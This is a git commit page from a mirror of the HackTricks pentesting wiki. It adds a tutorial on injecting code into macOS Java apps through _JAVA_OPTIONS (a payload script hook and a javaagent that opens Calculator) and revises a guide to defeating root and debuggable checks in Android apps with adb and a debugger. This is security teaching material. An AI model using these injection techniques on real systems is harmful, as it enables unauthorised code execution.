Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 01:17:36 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4172: change request with no subject merged in GitBook

Browse source
This commit is contained in:
CPol 2023-12-03 18:08:20 +00:00 committed by gitbook-bot
parent 6c2b902411
commit 81e10f47d7
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
5 changed files with 149 additions and 33 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -174,6 +174,7 @@
* [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md)
* [macOS xpc\_connection\_get\_audit\_token Attack](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc\_connection\_get\_audit\_token-attack.md)
* [macOS Thread Injection via Task port](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md)
* [macOS Java apps Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md)
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)

8
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
View file

@ -56,6 +56,14 @@ NIB files **define user interface (UI) elements** and their interactions within
[macos-dirty-nib.md](macos-dirty-nib.md)
{% endcontent-ref %}
### Java Applications Injection
It's possible to abuse certain java capabilities (like the **`_JAVA_OPTS`** env variable) to make a java application execute **arbitrary code/commands**.
{% content-ref url="macos-java-apps-injection.md" %}
[macos-java-apps-injection.md](macos-java-apps-injection.md)
{% endcontent-ref %}
### .Net Applications Injection
It's possible to inject code into .Net applications by **abusing the .Net debugging functionality** (not protected by macOS protections such as runtime hardening).

65
macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md Normal file
View file

@ -0,0 +1,65 @@
# macOS Java apps Injection
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## \_JAVA\_OPTIONS
The env variable **`_JAVA_OPTIONS`** can be used to inject arbitrary java parameters in the execution of a java compiled app:
```bash
# Write your payload in a script called /tmp/payload.sh
export _JAVA_OPTIONS='-Xmx5m -XX:OnOutOfMemoryError="/tmp/payload.sh"'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
```
However, that will trigger an error on the executed app, another more stealth way is to create a java agent and use:
```bash
export _JAVA_OPTIONS='-javaagent:agent.jar'
"/Applications/Burp Suite Professional.app/Contents/MacOS/JavaApplicationStub"
```
Where the agent can be:
```java
import java.io.*;
import java.lang.instrument.*;
public class Hax {
public static void premain(String args, Instrumentation inst) {
try {
Process p = Runtime.getRuntime().exec("open -a Calculator");
}
catch (Exception err) {
err.printStackTrace();
}
}
}
```
## vmoptions.txt
This file support the specification of **Java params** when Java is executed. You could use some of the previous tricks to change the java params and **make the process execute arbitrary commands**.\
Moreover, this file can also include others, so you could also change an included file.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

2
mobile-pentesting/android-app-pentesting/README.md
View file

@ -27,6 +27,8 @@ Stay informed with the newest bug bounties launching and crucial platform update
Join us on [Discord](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
{% embed url="https://discord.com/invite/N3FrSbmwdy" %}
## Android Applications Basics
It's highly recommended to start reading this page to know about the **most important parts related to Android security and the most dangerous components in an Android application**:

106
mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md
View file

@ -1,23 +1,66 @@
# Exploiting a debuggeable application
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## **Bypassing root and debuggeable checks**
**Information copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)
**This section of the post is a summary from the post** [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0)
### Make the app debuggeable and execute it waiting for a debugger
Step 1 — Decompile the APK using APK-GUI tool. Edit the _android-manifest_ file and add _**android:debuggable=true**,_ to make the application debuggable. Recompile, sign and zipalign the application.
Step 2 — Install the application via -
_**adb install \<application\_name>**._
Step 3 — Get the package name using _-_
_**adb shell pm list packages 3**_ (to list the 3rd party applications.
Step 4 — Now make the application wait for debugger via this command — _**adb shell am setup-debug-app w \<package\_name>**_.
**Note —** You will require to run this command every time, before you start the application, so that application waits for debugger.
To make it persistent you can use
_**adb shell am setup-debug-app w -persistent \<package\_name>**._
To clear all the flags
_**adb shell am clear-debug-app \<package\_name>**._
Step 5 — Open the _**Android Studio -> File -> Open Profile or APK**_ -> Open the recompiled APK.
Step 6 — Add breakpoints to the java files
* _**MainActivity.java — onCreate method, b.java, ContextWrapper.java**_
### Bypass checks
At tome point the app will get information about the app to check if it's debuggeable and will also search for some binaries to see if the mobile is rooted. Using the debugger it's possible to change the app info to unset the debuggeable bit and change also the searched binaries names so those checks are bypassed. For example for the debuggeable check:
Step 1 — Under the variable section of the debugger console, navigate to “_**this mLoadedAPK -> mApplicationInfo -> flags = 814267974**_”
<figure><img src="https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png" alt="" height="192" width="700"><figcaption><p>screenshot 9</p></figcaption></figure>
_**Note: flags = 814267974 in binary bits is 11000011100111011110. This means “Flag\_debuggable” is set.**_
Step 2 — Change the flag value to 814267972. Binary bits conversion — 110000101101000000100010100.
## **Exploiting a vuln**
**The following part of the post was copied from** [**https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article**](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications/#article)
To make this article more interesting, I have developed a vulnerable application for demonstration purposes, which has a “**button**” and a “**textview**“.
@ -31,7 +74,7 @@ Figure 1
If we click the button, it says “**Try Again**“. Now, our goal is to change the message “Try Again” to “Hacked” without modifying the applications source code. To be precise, we have to change it at runtime.
## **Required tools**
### **Required tools**
* Emulator
* adb Android Debug Bridge
@ -39,7 +82,7 @@ If we click the button, it says “**Try Again**“. Now, our goal is to change
In my case, to make the installations easier, I am using Android Tamer since all the above required tools are pre-installed.
## **Topics Involved**
### **Topics Involved**
* Checking for Vulnerability.
* Getting Ready with the Setup.
@ -47,23 +90,27 @@ In my case, to make the installations easier, I am using Android Tamer since all
Lets begin the game.
## **Checking for vulnerability**
### **Checking for vulnerability**
In fact, this is the easiest part of the entire article.
* Decompile the application using APKTOOL to get the AndroidManifest.xml file using the following command.
* Decompile the application using `apktool` to get the `AndroidManifest.xml` file using the following command.
apktool d \<vulnerableapp>.apk
```bash
apktool d <vulnerableapp>.apk
```
* Inspect Androidmanifest.xml file for the following line.
* Inspect `Androidmanifest.xml` file for the following line.
android\_debuggable=”true”
```bash
android_debuggable="true"
```
If you find the above line in the AndroidManifest.xml file, the application is debuggable and it can be exploited.
**Note:** We used APKTOOL to see whether the app is debuggable or not. We wont touch or modify any piece of code as mentioned earlier.
**Note:** We used `apktool` to see whether the app is debuggable or not. We wont touch or modify any piece of code as mentioned earlier.
## **Getting ready with the setup**
### **Getting ready with the setup**
In this step, we will set up all the required things to inject code in to the app during its execution. As mentioned in the previous article, we will use remote debugging in this article.
@ -101,7 +148,7 @@ Figure 4
Figure 5
## **Runtime code injection**
### **Runtime code injection**
In this step, we will actually exploit the vulnerable application by modifying its behavior at runtime.
@ -215,21 +262,14 @@ Figure 19
We have successfully modified the output of the application at runtime. This is just an example to show how an applications behavior can be modified if the application is debuggable. We can perform various other things including “**Getting a shell**” on the device in the context of the vulnerable application.
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>